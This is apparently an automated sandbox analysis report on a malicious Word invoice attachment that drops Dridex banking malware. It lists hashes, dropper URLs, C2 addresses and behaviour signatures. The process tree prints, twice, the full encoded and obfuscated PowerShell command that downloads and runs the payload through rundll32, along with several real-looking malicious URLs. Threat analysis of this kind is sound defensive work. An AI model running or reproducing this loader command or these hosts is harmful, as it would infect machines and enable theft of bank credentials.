Analysis

  • max time kernel
    71s
  • max time network
    82s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    09-12-2020 14:23

General

  • Target

    Invoice.29002611.doc

  • Size

    121KB

  • MD5

    25b5fa933bd817640e0667d6c44492ec

  • SHA1

    62dea05abf45ffc52c9310a31bae70b595edf301

  • SHA256

    4a982207a74a1474f377367f8a55354d45231cad96b3ca24c69be6e833fa5b55

  • SHA512

    f638ea0d0d3e0e107b596fff05357748f30237e8228158e7e3bdae653c576a9711fa16d9f3613479a49a20b921d2048364f58b08bc74f0377e33b7d02f0792c5

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://urbanwxrld.com/rimwhu.rar

exe.dropper

http://www.madmaxswimwear.com/ikkai8.rar

exe.dropper

https://nubemp.com.br/navm0jxg.zip

exe.dropper

https://sharpec.com/j6pi9eq7.rar

exe.dropper

https://miracle-missions.com/rirgclt4b.zip

exe.dropper

https://blackbeardrecords.com/jdtts3krp.zip

exe.dropper

https://ochaclean.com/x8qaxr55.zip

exe.dropper

https://chakanaecu.com/zvh4acz7.rar

Extracted

Family

dridex

Botnet

10555

C2

169.255.216.36:443

138.201.138.91:3389

89.174.36.41:4643

87.106.89.36:3389

rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Dridex Loader 1 IoCs

    Detects Dridex both x86 and x64 loader in memory.

  • Blocklisted process makes network request 6 IoCs
  • Loads dropped DLL 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies registry class 280 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Invoice.29002611.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1208
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IABTAGUAVAAtAGkAVABFAE0AIAAgAHYAYQBSAGkAQQBiAGwARQA6ADkAZwAzACAAIAAoACAAIABbAFQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAzAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAFIAWQAnACwAJwBPAC4ARABJAHIARQAnACwAJwBPACcALAAnAEMAdAAnACwAJwBTAFkAcwBUAEUATQAuAEkAJwApACkAIAA7ACAAIAAkAGoAdgA2AHQAYQA3ACAAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAOAB9AHsAMgB9AHsANAB9AHsAMwB9AHsANQB9AHsAMAB9AHsAMQB9AHsANwB9AHsANgB9ACIALQBmACcASQBDAEUAcABvACcALAAnAEkAbgBUACcALAAnAGUATQAuAG4AJwAsACcAcwBlAHIAJwAsACcARQBUAC4AJwAsACcAVgAnACwAJwBHAGUAcgAnACwAJwBNAGEAbgBBACcALAAnAFMAeQBzAFQAJwApADsAIAAkAFMAaQBnADQAMABqAG4APQAoACgAJwBWACcAKwAnAHkANgAnACkAKwAnADQAJwArACgAJwBrACcAKwAnAF8AZgAnACkAKQA7ACQARwBpAHYAbQA0AHQANgA9ACQAQQBlAGEANAAyAGUAYQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQwBjADYAdwA4ADcAdAA7ACQARAAzAHkAdQBuAGMAcwA9ACgAKAAnAFMAYwBoACcAKwAnAGUAJwApACsAKAAnADAAMgAnACsAJwA3ACcAKQApADsAIAAoACAAZwBDAGkAIABWAGEAUgBpAGEAQgBsAGUAOgA5AEcAMwApAC4AVgBhAGwAdQBFADoAOgAiAEMAcgBlAGAAQQB0AEUARABJAGAAUgBFAEMAdABvAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBsAHUAcwAnACsAJwBFACcAKQArACcAZABnACcAKwAoACcAYgAzADQAdQAnACsAJwBsACcAKQArACgAJwB1AHMAJwArACcATQAnACkAKwAoACcANwBrACcAKwAnAG0AJwApACsAKAAnAGUANwBkACcAKwAnAGwAJwApACsAJwB1AHMAJwApACAAIAAtAHIAZQBQAGwAYQBjAEUAIAAgACgAWwBDAGgAQQBSAF0AMQAwADgAKwBbAEMAaABBAFIAXQAxADEANwArAFsAQwBoAEEAUgBdADEAMQA1ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABTAHgAbABfADYAawBkAD0AKAAnAEYANgAnACsAKAAnAHoAOAAnACsAJwBvADMAaAAnACkAKQA7ACAAKABnAGUAVAAtAHYAQQBSAEkAYQBCAGwAZQAgACgAIgBqACIAKwAiAFYANgB0AGEANwAiACkAIAAgAC0AVgBBAGwAVQBlAE8ATgBsAHkAIAApADoAOgAiAHMAYABlAEMAVQByAGAAaQBgAFQAeQBgAFAAUgBPAFQAbwBDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQARAByAHkAcwBtAHcAawA9ACgAKAAnAFAAJwArACcAZQBjAHkAOAA4ACcAKQArACcAbwAnACkAOwAkAEQAeABpAG0AcgBoAGkAIAA9ACAAKAAnAEUAJwArACgAJwBvACcAKwAnADcAawAnACkAKwAoACcAdgB1ACcAKwAnAHQAJwApACkAOwAkAFIAYwBtAHQAbgB3AHMAPQAoACcAVwAnACsAKAAnAGsAXwAnACsAJwBzAGQAbgBlACcAKQApADsAJABJAG0AbgAyAGgAcAB6AD0AKAAoACcATABtADEAJwArACcAYQAnACkAKwAnADcAJwArACcAOQBtACcAKQA7ACQARQA3AHYAaAA3ADgAZgA9ACQASABPAE0ARQArACgAKAAoACcAWAA1AGUARQAnACsAJwBkAGcAYgAnACsAJwAzADQAJwApACsAKAAnAHUAJwArACcAWAA1AGUATQAnACkAKwAoACcANwAnACsAJwBrAG0AJwApACsAKAAnAGUANwAnACsAJwBkAFgAJwApACsAJwA1AGUAJwApAC4AIgByAGUAUABsAGAAQQBgAEMARQAiACgAKABbAEMAaABBAHIAXQA4ADgAKwBbAEMAaABBAHIAXQA1ADMAKwBbAEMAaABBAHIAXQAxADAAMQApACwAJwBcACcAKQApACsAJABEAHgAaQBtAHIAaABpACsAKAAnAC4AJwArACgAJwBkAGwAJwArACcAbAAnACkAKQA7ACQAWQA0ADUAawBrADMAdwA9ACgAKAAnAFAAZQA0ACcAKwAnAHcAJwApACsAKAAnADgAJwArACcANwBqACcAKQApADsAJABBADQANAByAGkAegBjAD0AbgBlAFcALQBvAGAAQgBKAEUAYABjAHQAIABuAEUAdAAuAFcAZQBiAGMATABJAGUATgB0ADsAJABTADUAYQBtAHEAZwB2AD0AKAAoACgAKAAnAGgAJwArACcAdAAnACsAJwB0AHAAOgBKACkAKAAzAHMAJwArACcAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAoACgAJwAoADMAJwArACcAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAdQByAGIAJwArACcAYQAnACsAJwBuAHcAeAByAGwAJwArACcAZAAuACcAKQApACsAJwBjAG8AJwArACgAKAAnAG0ASgAnACsAJwApACcAKQApACsAKAAoACcAKAAzACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKAByAGkAJwArACcAbQAnACkAKQArACcAdwBoACcAKwAoACcAdQAuACcAKwAnAHIAJwApACsAJwBhACcAKwAoACgAJwByAEAAaAB0ACcAKwAnAHQAcAAnACsAJwA6ACcAKwAnAEoAKQAoADMAcwAyACkAJwApACkAKwAoACgAJwAoAEoAJwApACkAKwAoACgAJwApACgAJwApACkAKwAnADMAcwAnACsAKAAoACcAMgApACgAdwB3AHcAJwArACcALgBtACcAKwAnAGEAZAAnACkAKQArACgAJwBtACcAKwAnAGEAJwArACcAeABzAHcAaQAnACsAJwBtACcAKwAnAHcAZQBhAHIALgBjAG8AJwApACsAKAAoACcAbQAnACsAJwBKACkAJwApACkAKwAoACgAJwAoADMAcwAnACsAJwAyACcAKQApACsAJwApACcAKwAoACgAJwAoAGkAawBrACcAKwAnAGEAJwApACkAKwAoACcAaQA4AC4AJwArACcAcgAnACkAKwAnAGEAcgAnACsAKAAoACcAQABoAHQAdAAnACsAJwBwAHMAJwArACcAOgBKACcAKwAnACkAJwApACkAKwAoACgAJwAoADMAJwArACcAcwAyACkAKAAnACkAKQArACcASgAnACsAKAAoACcAKQAoADMAJwArACcAcwAyACkAJwApACkAKwAoACgAJwAoACcAKwAnAG4AJwArACcAdQAnACsAJwBiACcAKwAnAGUAbQBwAC4AYwBvAG0ALgBiAHIASgAnACkAKQArACgAKAAnACkAJwArACcAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwBuAGEAJwApACkAKwAoACcAdgBtADAAJwArACcAagB4ACcAKwAnAGcAJwApACsAJwAuACcAKwAoACcAegAnACsAJwBpAHAAQABoAHQAdABwACcAKQArACgAJwBzADoAJwArACcASgAnACkAKwAoACgAJwApACgAJwApACkAKwAnADMAJwArACgAKAAnAHMAMgApACgASgApACcAKwAnACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKABzAGgAJwArACcAYQAnACkAKQArACcAcgBwACcAKwAoACcAZQBjACcAKwAnAC4AYwBvAG0AJwApACsAKAAoACcASgAnACsAJwApACgAMwBzACcAKwAnADIAKQAoACcAKwAnAGoANgBwACcAKQApACsAKAAnAGkAOQBlAHEANwAnACsAJwAuAHIAYQAnACsAJwByAEAAaAB0ACcAKQArACcAdABwACcAKwAnAHMAOgAnACsAJwBKACcAKwAoACgAJwApACgAMwAnACsAJwBzADIAJwArACcAKQAoACcAKwAnAEoAKQAnACkAKQArACgAJwAoADMAJwArACcAcwAyACkAJwApACsAKAAoACcAKABtACcAKwAnAGkAJwApACkAKwAoACcAcgBhAGMAbAAnACsAJwBlAC0AJwApACsAKAAoACcAbQBpACcAKwAnAHMAcwBpAG8AbgBzACcAKwAnAC4AYwBvACcAKwAnAG0ASgApACgAMwAnACsAJwBzADIAKQAoAHIAJwArACcAaQByAGcAJwApACkAKwAnAGMAJwArACgAKAAnAGwAJwArACcAdAA0AGIALgAnACsAJwB6AGkAJwArACcAcABAAGgAdAB0AHAAcwA6AEoAKQAnACkAKQArACgAJwAoACcAKwAnADMAcwAyACkAKABKACkAJwApACsAJwAoACcAKwAoACgAJwAzAHMAMgApACgAYgBsACcAKwAnAGEAJwArACcAYwBrACcAKQApACsAKAAnAGIAJwArACcAZQBhAHIAJwApACsAJwBkACcAKwAoACcAcgBlACcAKwAnAGMAbwAnACkAKwAoACgAJwByAGQAcwAuACcAKwAnAGMAbwBtAEoAKQAnACsAJwAoADMAJwArACcAcwAyACcAKwAnACkAKABqAGQAdAB0AHMAMwBrACcAKQApACsAKAAnAHIAcAAuACcAKwAnAHoAaQBwACcAKwAnAEAAaAB0AHQAJwArACcAcAAnACkAKwAoACgAJwBzADoASgApACgAMwAnACsAJwBzACcAKwAnADIAKQAoAEoAKQAnACsAJwAoACcAKQApACsAKAAoACcAMwBzADIAKQAoACcAKwAnAG8AYwBoAGEAYwBsAGUAYQBuACcAKwAnAC4AJwApACkAKwAnAGMAbwAnACsAKAAoACcAbQBKACkAJwArACcAKAAzAHMAJwArACcAMgAnACkAKQArACgAKAAnACkAJwArACcAKAB4ACcAKwAnADgAcQBhACcAKQApACsAKAAnAHgAcgA1ACcAKwAnADUALgB6AGkAJwArACcAcABAAGgAdAB0ACcAKwAnAHAAcwAnACsAJwA6ACcAKQArACgAKAAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzADIAJwArACcAKQAoACcAKQApACsAKAAoACcASgApACcAKwAnACgAMwBzACcAKwAnADIAJwApACkAKwAoACgAJwApACcAKwAnACgAYwBoACcAKQApACsAJwBhACcAKwAnAGsAYQAnACsAJwBuACcAKwAoACgAJwBhAGUAYwB1AC4AYwBvAG0AJwArACcASgApACcAKwAnACgAMwBzADIAKQAnACsAJwAoAHoAdgAnACsAJwBoADQAYQAnACkAKQArACgAJwBjAHoAJwArACcANwAuACcAKQArACcAcgBhACcAKwAnAHIAJwApACkALgAiAHIAYABlAFAAbABhAEMARQAiACgAKAAoACcASgAnACsAKAAoACcAKQAnACsAJwAoADMAJwArACcAcwAyACkAJwApACkAKwAnACgAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAGgAJwArACcAdwBlACcAKQApAFsAMABdACkALgAiAFMAUABgAEwAaQB0ACIAKAAkAEcAMwA5AGoAZwAzAHgAIAArACAAJABHAGkAdgBtADQAdAA2ACAAKwAgACQASgBhAGMAYgA4AHMAYwApADsAJABZAHAAdQBrAHQANQA2AD0AKAAoACcAUwAnACsAJwBvAGYAJwApACsAKAAnAGQAJwArACcAeABjAHAAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAYgBsAGQAYgA3AG0AIABpAG4AIAAkAFMANQBhAG0AcQBnAHYAIAB8ACAAUwBgAG8AcgB0AGAALQBgAG8AQgBqAEUAQwB0ACAAewBHAGAARQBUAC0AUgBgAEEAbgBgAGQATwBNAH0AKQB7AHQAcgB5AHsAJABBADQANAByAGkAegBjAC4AIgBEAG8AdwBOAGAAbABgAG8AQQBkAGYASQBgAGwAZQAiACgAJABJAGIAbABkAGIANwBtACwAIAAkAEUANwB2AGgANwA4AGYAKQA7ACQAQgA3ADIAZQBfAGMAcAA9ACgAJwBFAHUAJwArACgAJwA5AGoAJwArACcAMQB2ACcAKQArACcAZAAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQAnACsAJwBJAHQAZQBtACcAKQAgACQARQA3AHYAaAA3ADgAZgApAC4AIgBsAGAAZQBgAE4AZwB0AEgAIgAgAC0AZwBlACAAMwAxADgANwA1ACkAIAB7ACYAKAAnAHIAJwArACcAdQBuAGQAbABsADMAMgAnACsAJwAuAGUAeAAnACsAJwBlACcAKQAgACQARQA3AHYAaAA3ADgAZgAsADAAOwAkAFcAeQBzAGwAMABrAHEAPQAoACcASgAnACsAJwB1ACcAKwAoACcANAAnACsAJwB4AHUAeABrACcAKQApADsAYgByAGUAYQBrADsAJABNADAAYQAzADAAOQA3AD0AKAAoACcASwAnACsAJwBlAF8AJwApACsAJwA4ACcAKwAoACcAdgAnACsAJwA2AGYAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIAYgAzAG8AOQBqAGQAPQAoACgAJwBJACcAKwAnAGcAeAAnACkAKwAnAHQAJwArACgAJwB3AHQAJwArACcAdwAnACkAKQA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1320
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:1220
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -w hidden -ENCOD IABTAGUAVAAtAGkAVABFAE0AIAAgAHYAYQBSAGkAQQBiAGwARQA6ADkAZwAzACAAIAAoACAAIABbAFQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAzAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAFIAWQAnACwAJwBPAC4ARABJAHIARQAnACwAJwBPACcALAAnAEMAdAAnACwAJwBTAFkAcwBUAEUATQAuAEkAJwApACkAIAA7ACAAIAAkAGoAdgA2AHQAYQA3ACAAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAOAB9AHsAMgB9AHsANAB9AHsAMwB9AHsANQB9AHsAMAB9AHsAMQB9AHsANwB9AHsANgB9ACIALQBmACcASQBDAEUAcABvACcALAAnAEkAbgBUACcALAAnAGUATQAuAG4AJwAsACcAcwBlAHIAJwAsACcARQBUAC4AJwAsACcAVgAnACwAJwBHAGUAcgAnACwAJwBNAGEAbgBBACcALAAnAFMAeQBzAFQAJwApADsAIAAkAFMAaQBnADQAMABqAG4APQAoACgAJwBWACcAKwAnAHkANgAnACkAKwAnADQAJwArACgAJwBrACcAKwAnAF8AZgAnACkAKQA7ACQARwBpAHYAbQA0AHQANgA9ACQAQQBlAGEANAAyAGUAYQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQwBjADYAdwA4ADcAdAA7ACQARAAzAHkAdQBuAGMAcwA9ACgAKAAnAFMAYwBoACcAKwAnAGUAJwApACsAKAAnADAAMgAnACsAJwA3ACcAKQApADsAIAAoACAAZwBDAGkAIABWAGEAUgBpAGEAQgBsAGUAOgA5AEcAMwApAC4AVgBhAGwAdQBFADoAOgAiAEMAcgBlAGAAQQB0AEUARABJAGAAUgBFAEMAdABvAGAAUgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwBsAHUAcwAnACsAJwBFACcAKQArACcAZABnACcAKwAoACcAYgAzADQAdQAnACsAJwBsACcAKQArACgAJwB1AHMAJwArACcATQAnACkAKwAoACcANwBrACcAKwAnAG0AJwApACsAKAAnAGUANwBkACcAKwAnAGwAJwApACsAJwB1AHMAJwApACAAIAAtAHIAZQBQAGwAYQBjAEUAIAAgACgAWwBDAGgAQQBSAF0AMQAwADgAKwBbAEMAaABBAFIAXQAxADEANwArAFsAQwBoAEEAUgBdADEAMQA1ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABTAHgAbABfADYAawBkAD0AKAAnAEYANgAnACsAKAAnAHoAOAAnACsAJwBvADMAaAAnACkAKQA7ACAAKABnAGUAVAAtAHYAQQBSAEkAYQBCAGwAZQAgACgAIgBqACIAKwAiAFYANgB0AGEANwAiACkAIAAgAC0AVgBBAGwAVQBlAE8ATgBsAHkAIAApADoAOgAiAHMAYABlAEMAVQByAGAAaQBgAFQAeQBgAFAAUgBPAFQAbwBDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQARAByAHkAcwBtAHcAawA9ACgAKAAnAFAAJwArACcAZQBjAHkAOAA4ACcAKQArACcAbwAnACkAOwAkAEQAeABpAG0AcgBoAGkAIAA9ACAAKAAnAEUAJwArACgAJwBvACcAKwAnADcAawAnACkAKwAoACcAdgB1ACcAKwAnAHQAJwApACkAOwAkAFIAYwBtAHQAbgB3AHMAPQAoACcAVwAnACsAKAAnAGsAXwAnACsAJwBzAGQAbgBlACcAKQApADsAJABJAG0AbgAyAGgAcAB6AD0AKAAoACcATABtADEAJwArACcAYQAnACkAKwAnADcAJwArACcAOQBtACcAKQA7ACQARQA3AHYAaAA3ADgAZgA9ACQASABPAE0ARQArACgAKAAoACcAWAA1AGUARQAnACsAJwBkAGcAYgAnACsAJwAzADQAJwApACsAKAAnAHUAJwArACcAWAA1AGUATQAnACkAKwAoACcANwAnACsAJwBrAG0AJwApACsAKAAnAGUANwAnACsAJwBkAFgAJwApACsAJwA1AGUAJwApAC4AIgByAGUAUABsAGAAQQBgAEMARQAiACgAKABbAEMAaABBAHIAXQA4ADgAKwBbAEMAaABBAHIAXQA1ADMAKwBbAEMAaABBAHIAXQAxADAAMQApACwAJwBcACcAKQApACsAJABEAHgAaQBtAHIAaABpACsAKAAnAC4AJwArACgAJwBkAGwAJwArACcAbAAnACkAKQA7ACQAWQA0ADUAawBrADMAdwA9ACgAKAAnAFAAZQA0ACcAKwAnAHcAJwApACsAKAAnADgAJwArACcANwBqACcAKQApADsAJABBADQANAByAGkAegBjAD0AbgBlAFcALQBvAGAAQgBKAEUAYABjAHQAIABuAEUAdAAuAFcAZQBiAGMATABJAGUATgB0ADsAJABTADUAYQBtAHEAZwB2AD0AKAAoACgAKAAnAGgAJwArACcAdAAnACsAJwB0AHAAOgBKACkAKAAzAHMAJwArACcAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAoACgAJwAoADMAJwArACcAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAdQByAGIAJwArACcAYQAnACsAJwBuAHcAeAByAGwAJwArACcAZAAuACcAKQApACsAJwBjAG8AJwArACgAKAAnAG0ASgAnACsAJwApACcAKQApACsAKAAoACcAKAAzACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKAByAGkAJwArACcAbQAnACkAKQArACcAdwBoACcAKwAoACcAdQAuACcAKwAnAHIAJwApACsAJwBhACcAKwAoACgAJwByAEAAaAB0ACcAKwAnAHQAcAAnACsAJwA6ACcAKwAnAEoAKQAoADMAcwAyACkAJwApACkAKwAoACgAJwAoAEoAJwApACkAKwAoACgAJwApACgAJwApACkAKwAnADMAcwAnACsAKAAoACcAMgApACgAdwB3AHcAJwArACcALgBtACcAKwAnAGEAZAAnACkAKQArACgAJwBtACcAKwAnAGEAJwArACcAeABzAHcAaQAnACsAJwBtACcAKwAnAHcAZQBhAHIALgBjAG8AJwApACsAKAAoACcAbQAnACsAJwBKACkAJwApACkAKwAoACgAJwAoADMAcwAnACsAJwAyACcAKQApACsAJwApACcAKwAoACgAJwAoAGkAawBrACcAKwAnAGEAJwApACkAKwAoACcAaQA4AC4AJwArACcAcgAnACkAKwAnAGEAcgAnACsAKAAoACcAQABoAHQAdAAnACsAJwBwAHMAJwArACcAOgBKACcAKwAnACkAJwApACkAKwAoACgAJwAoADMAJwArACcAcwAyACkAKAAnACkAKQArACcASgAnACsAKAAoACcAKQAoADMAJwArACcAcwAyACkAJwApACkAKwAoACgAJwAoACcAKwAnAG4AJwArACcAdQAnACsAJwBiACcAKwAnAGUAbQBwAC4AYwBvAG0ALgBiAHIASgAnACkAKQArACgAKAAnACkAJwArACcAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwBuAGEAJwApACkAKwAoACcAdgBtADAAJwArACcAagB4ACcAKwAnAGcAJwApACsAJwAuACcAKwAoACcAegAnACsAJwBpAHAAQABoAHQAdABwACcAKQArACgAJwBzADoAJwArACcASgAnACkAKwAoACgAJwApACgAJwApACkAKwAnADMAJwArACgAKAAnAHMAMgApACgASgApACcAKwAnACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKABzAGgAJwArACcAYQAnACkAKQArACcAcgBwACcAKwAoACcAZQBjACcAKwAnAC4AYwBvAG0AJwApACsAKAAoACcASgAnACsAJwApACgAMwBzACcAKwAnADIAKQAoACcAKwAnAGoANgBwACcAKQApACsAKAAnAGkAOQBlAHEANwAnACsAJwAuAHIAYQAnACsAJwByAEAAaAB0ACcAKQArACcAdABwACcAKwAnAHMAOgAnACsAJwBKACcAKwAoACgAJwApACgAMwAnACsAJwBzADIAJwArACcAKQAoACcAKwAnAEoAKQAnACkAKQArACgAJwAoADMAJwArACcAcwAyACkAJwApACsAKAAoACcAKABtACcAKwAnAGkAJwApACkAKwAoACcAcgBhAGMAbAAnACsAJwBlAC0AJwApACsAKAAoACcAbQBpACcAKwAnAHMAcwBpAG8AbgBzACcAKwAnAC4AYwBvACcAKwAnAG0ASgApACgAMwAnACsAJwBzADIAKQAoAHIAJwArACcAaQByAGcAJwApACkAKwAnAGMAJwArACgAKAAnAGwAJwArACcAdAA0AGIALgAnACsAJwB6AGkAJwArACcAcABAAGgAdAB0AHAAcwA6AEoAKQAnACkAKQArACgAJwAoACcAKwAnADMAcwAyACkAKABKACkAJwApACsAJwAoACcAKwAoACgAJwAzAHMAMgApACgAYgBsACcAKwAnAGEAJwArACcAYwBrACcAKQApACsAKAAnAGIAJwArACcAZQBhAHIAJwApACsAJwBkACcAKwAoACcAcgBlACcAKwAnAGMAbwAnACkAKwAoACgAJwByAGQAcwAuACcAKwAnAGMAbwBtAEoAKQAnACsAJwAoADMAJwArACcAcwAyACcAKwAnACkAKABqAGQAdAB0AHMAMwBrACcAKQApACsAKAAnAHIAcAAuACcAKwAnAHoAaQBwACcAKwAnAEAAaAB0AHQAJwArACcAcAAnACkAKwAoACgAJwBzADoASgApACgAMwAnACsAJwBzACcAKwAnADIAKQAoAEoAKQAnACsAJwAoACcAKQApACsAKAAoACcAMwBzADIAKQAoACcAKwAnAG8AYwBoAGEAYwBsAGUAYQBuACcAKwAnAC4AJwApACkAKwAnAGMAbwAnACsAKAAoACcAbQBKACkAJwArACcAKAAzAHMAJwArACcAMgAnACkAKQArACgAKAAnACkAJwArACcAKAB4ACcAKwAnADgAcQBhACcAKQApACsAKAAnAHgAcgA1ACcAKwAnADUALgB6AGkAJwArACcAcABAAGgAdAB0ACcAKwAnAHAAcwAnACsAJwA6ACcAKQArACgAKAAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzADIAJwArACcAKQAoACcAKQApACsAKAAoACcASgApACcAKwAnACgAMwBzACcAKwAnADIAJwApACkAKwAoACgAJwApACcAKwAnACgAYwBoACcAKQApACsAJwBhACcAKwAnAGsAYQAnACsAJwBuACcAKwAoACgAJwBhAGUAYwB1AC4AYwBvAG0AJwArACcASgApACcAKwAnACgAMwBzADIAKQAnACsAJwAoAHoAdgAnACsAJwBoADQAYQAnACkAKQArACgAJwBjAHoAJwArACcANwAuACcAKQArACcAcgBhACcAKwAnAHIAJwApACkALgAiAHIAYABlAFAAbABhAEMARQAiACgAKAAoACcASgAnACsAKAAoACcAKQAnACsAJwAoADMAJwArACcAcwAyACkAJwApACkAKwAnACgAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAGgAJwArACcAdwBlACcAKQApAFsAMABdACkALgAiAFMAUABgAEwAaQB0ACIAKAAkAEcAMwA5AGoAZwAzAHgAIAArACAAJABHAGkAdgBtADQAdAA2ACAAKwAgACQASgBhAGMAYgA4AHMAYwApADsAJABZAHAAdQBrAHQANQA2AD0AKAAoACcAUwAnACsAJwBvAGYAJwApACsAKAAnAGQAJwArACcAeABjAHAAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAYgBsAGQAYgA3AG0AIABpAG4AIAAkAFMANQBhAG0AcQBnAHYAIAB8ACAAUwBgAG8AcgB0AGAALQBgAG8AQgBqAEUAQwB0ACAAewBHAGAARQBUAC0AUgBgAEEAbgBgAGQATwBNAH0AKQB7AHQAcgB5AHsAJABBADQANAByAGkAegBjAC4AIgBEAG8AdwBOAGAAbABgAG8AQQBkAGYASQBgAGwAZQAiACgAJABJAGIAbABkAGIANwBtACwAIAAkAEUANwB2AGgANwA4AGYAKQA7ACQAQgA3ADIAZQBfAGMAcAA9ACgAJwBFAHUAJwArACgAJwA5AGoAJwArACcAMQB2ACcAKQArACcAZAAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQAnACsAJwBJAHQAZQBtACcAKQAgACQARQA3AHYAaAA3ADgAZgApAC4AIgBsAGAAZQBgAE4AZwB0AEgAIgAgAC0AZwBlACAAMwAxADgANwA1ACkAIAB7ACYAKAAnAHIAJwArACcAdQBuAGQAbABsADMAMgAnACsAJwAuAGUAeAAnACsAJwBlACcAKQAgACQARQA3AHYAaAA3ADgAZgAsADAAOwAkAFcAeQBzAGwAMABrAHEAPQAoACcASgAnACsAJwB1ACcAKwAoACcANAAnACsAJwB4AHUAeABrACcAKQApADsAYgByAGUAYQBrADsAJABNADAAYQAzADAAOQA3AD0AKAAoACcASwAnACsAJwBlAF8AJwApACsAJwA4ACcAKwAoACcAdgAnACsAJwA2AGYAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIAYgAzAG8AOQBqAGQAPQAoACgAJwBJACcAKwAnAGcAeAAnACkAKwAnAHQAJwArACgAJwB3AHQAJwArACcAdwAnACkAKQA=
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1496
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Edgb34u\M7kme7d\Eo7kvut.dll 0
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1680
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Edgb34u\M7kme7d\Eo7kvut.dll 0
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Checks whether UAC is enabled
            PID:1552

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      MD5

      b31f3ce855aec9384e515d5fa9465845

      SHA1

      167fac4ecadc73772210109fdf735f4166d6ef8b

      SHA256

      d0064583cbd22a8e73e5b2e09dcbbf55a60ce36eb0c7d65c9c75bab2f3910a65

      SHA512

      c83fa8ba1d5ff8aa777b799d654744a9a923b10e9578b3ac0abf6ccf785e7e8e414d63c3dac5e4bb6a43c039c34e0cf6e107a4f75859758014241a574cae48d0

